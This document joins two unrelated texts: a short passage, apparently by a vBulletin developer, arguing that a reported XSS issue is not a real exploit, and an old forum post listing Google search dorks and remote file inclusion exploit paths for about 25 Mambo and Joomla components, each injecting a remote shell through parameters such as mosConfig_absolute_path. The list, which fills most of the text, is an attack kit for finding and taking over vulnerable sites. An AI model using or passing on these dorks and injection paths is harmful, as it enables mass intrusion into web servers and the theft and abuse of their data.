I fully understand the significance of XSS and the numerous different ways to get it on the server but this focuses directly on the ability to place a web viewable document on the same domain which vBulletin doesn't provide itself. What the author of this exploit has described is a way to influence a user to visit a link to a crafted page already present on the domain, it isn't traversing out of the directory, its only changing the value of a src or an href parameter. Short of removing the ability for users to provide links there isn't a way to fix this, and even if we did they could just put the link on anyway and have someone copy and paste. In my eyes it isn't even an exploit at all, if you can create unsanitised content that is web viewable then there is a more significant problem that needs resolved and it out of our scope to fix. Scott MacVicar
All Of the Mambo & Joomla Script Remote File Inclussion Bugs..
Hi every body... There are some Remote File Inclussion bugs on Mamabo & Joomla Script... You can search ; ex: inurl:[Dork] , [dork], allinurl:[dork] on google or the other search sites.. Dork: com_comprofiler Expl: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:com_multibanners Expl: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:com_colophon expl: administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_simpleboard Expl: /components/com_simpleboard/file_upload.php?sbp=[Shell] Dork: inurl:"com_hashcash" Expl: /components/com_hashcash/server.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_htmlarea3_xtd-c" Expl: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_sitemap" Expl: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell] -- Dork: inurl:"com_forum" Expl: /components/com_forum/download.php?phpbb_root_path=[Shell] -- Dork: inurl:"com_pccookbook" Expl: /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_extcalendar Expl: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell] Dork: inurl:"minibb" Expl: /components/minibb/index.php?absolute_path=[Shell] - Dork: inurl:"com_smf" Expl: /components/com_smf/smf.php?mosConfig_absolute_path=[Shell] Expl: /modules/mod_calendar.php?absolute_path=[Shell] Dork: inurl:"com_pollxt" Expl: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_loudmounth" Expl: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_videodb" Expl: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_pcchess Expl: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_multibanners" Expl: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_a6mambohelpdesk" Expl: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell] Dork: inurl:"com_colophon" Expl: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_mgm" Expl: /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_mambatstaff" Expl: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_securityimages" Expl: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell] Expl: /components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_artlinks" Expl: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_galleria" Expl: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell] by SPYMETA Mail & MSN : [EMAIL PROTECTED]